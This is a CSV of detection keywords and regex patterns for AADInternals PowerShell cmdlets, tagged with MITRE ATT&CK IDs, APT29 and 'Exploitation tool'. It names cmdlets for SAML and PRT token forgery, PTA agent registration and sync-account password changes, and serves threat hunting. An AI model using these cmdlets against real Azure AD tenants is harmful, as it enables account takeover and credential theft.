"*New-AADIntSAMLToken*",".{0,1000}New\-AADIntSAMLToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntUserPRTToken*",".{0,1000}New\-AADIntUserPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Open-AADIntOffice365Portal*",".{0,1000}Open\-AADIntOffice365Portal.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Open-AADIntOWA*",".{0,1000}Open\-AADIntOWA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Read-AADIntAccesstoken*",".{0,1000}Read\-AADIntAccesstoken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Read-AADIntConfiguration*",".{0,1000}Read\-AADIntConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Register-AADIntHybridHealthServiceAgent*",".{0,1000}Register\-AADIntHybridHealthServiceAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Register-AADIntMFAApp*",".{0,1000}Register\-AADIntMFAApp.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Register-AADIntProxyAgent*",".{0,1000}Register\-AADIntProxyAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Register-AADIntPTAAgent*",".{0,1000}Register\-AADIntPTAAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Register-AADIntSyncAgent*",".{0,1000}Register\-AADIntSyncAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntAccessDeviceFromIntune*",".{0,1000}Remove\-AADIntAccessDeviceFromIntune.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntAzureDiagnosticSettings*",".{0,1000}Remove\-AADIntAzureDiagnosticSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntDeviceFromAzureAD*",".{0,1000}Remove\-AADIntDeviceFromAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntForceNTHash*",".{0,1000}Remove\-AADIntForceNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntHybridHealthService*",".{0,1000}Remove\-AADIntHybridHealthService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntHybridHealthServiceMember*",".{0,1000}Remove\-AADIntHybridHealthServiceMember.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntMSPartnerDelegatedAdminRoles*",".{0,1000}Remove\-AADIntMSPartnerDelegatedAdminRoles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntPTASpy*",".{0,1000}Remove\-AADIntPTASpy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntRolloutPolicy*",".{0,1000}Remove\-AADIntRolloutPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntRolloutPolicyGroups*",".{0,1000}Remove\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Remove-AADIntTeamsMessages*",".{0,1000}Remove\-AADIntTeamsMessages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Restore-AADIntADFSAutoRollover*",".{0,1000}Restore\-AADIntADFSAutoRollover.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Search-AADIntTeamsUser*",".{0,1000}Search\-AADIntTeamsUser.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Search-AADIntUnifiedAuditLog*",".{0,1000}Search\-AADIntUnifiedAuditLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntEASMessage*",".{0,1000}Send\-AADIntEASMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntHybridHealthServiceEventBlob*",".{0,1000}Send\-AADIntHybridHealthServiceEventBlob.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntHybridHealthServiceEvents*",".{0,1000}Send\-AADIntHybridHealthServiceEvents.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntOneDriveFile*",".{0,1000}Send\-AADIntOneDriveFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntOutlookMessage*",".{0,1000}Send\-AADIntOutlookMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Send-AADIntTeamsMessage*",".{0,1000}Send\-AADIntTeamsMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntADFSConfiguration*",".{0,1000}Set\-AADIntADFSConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntADFSPolicyStoreRules*",".{0,1000}Set\-AADIntADFSPolicyStoreRules.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntADSyncAccountPassword*",".{0,1000}Set\-AADIntADSyncAccountPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntADSyncEnabled*",".{0,1000}Set\-AADIntADSyncEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntAzureADFeature*",".{0,1000}Set\-AADIntAzureADFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntAzureADPolicyDetail*",".{0,1000}Set\-AADIntAzureADPolicyDetail.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntAzureRoleAssignment*",".{0,1000}Set\-AADIntAzureRoleAssignment.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDesktopSSO*",".{0,1000}Set\-AADIntDesktopSSO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDesktopSSOEnabled*",".{0,1000}Set\-AADIntDesktopSSOEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDeviceCompliant*",".{0,1000}Set\-AADIntDeviceCompliant.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDeviceRegAuthMethods*",".{0,1000}Set\-AADIntDeviceRegAuthMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDeviceTransportKey*",".{0,1000}Set\-AADIntDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDeviceWHfBKey*",".{0,1000}Set\-AADIntDeviceWHfBKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntDiagnosticSettingsDetails*",".{0,1000}Set\-AADIntDiagnosticSettingsDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntEASSettings*",".{0,1000}Set\-AADIntEASSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntOfficeUpdateBranch*",".{0,1000}Set\-AADIntOfficeUpdateBranch.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntPassThroughAuthentication*",".{0,1000}Set\-AADIntPassThroughAuthentication.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntPasswordHashSyncEnabled*",".{0,1000}Set\-AADIntPasswordHashSyncEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntProxySettings*",".{0,1000}Set\-AADIntProxySettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntPTACertificate*",".{0,1000}Set\-AADIntPTACertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntRolloutPolicy*",".{0,1000}Set\-AADIntRolloutPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
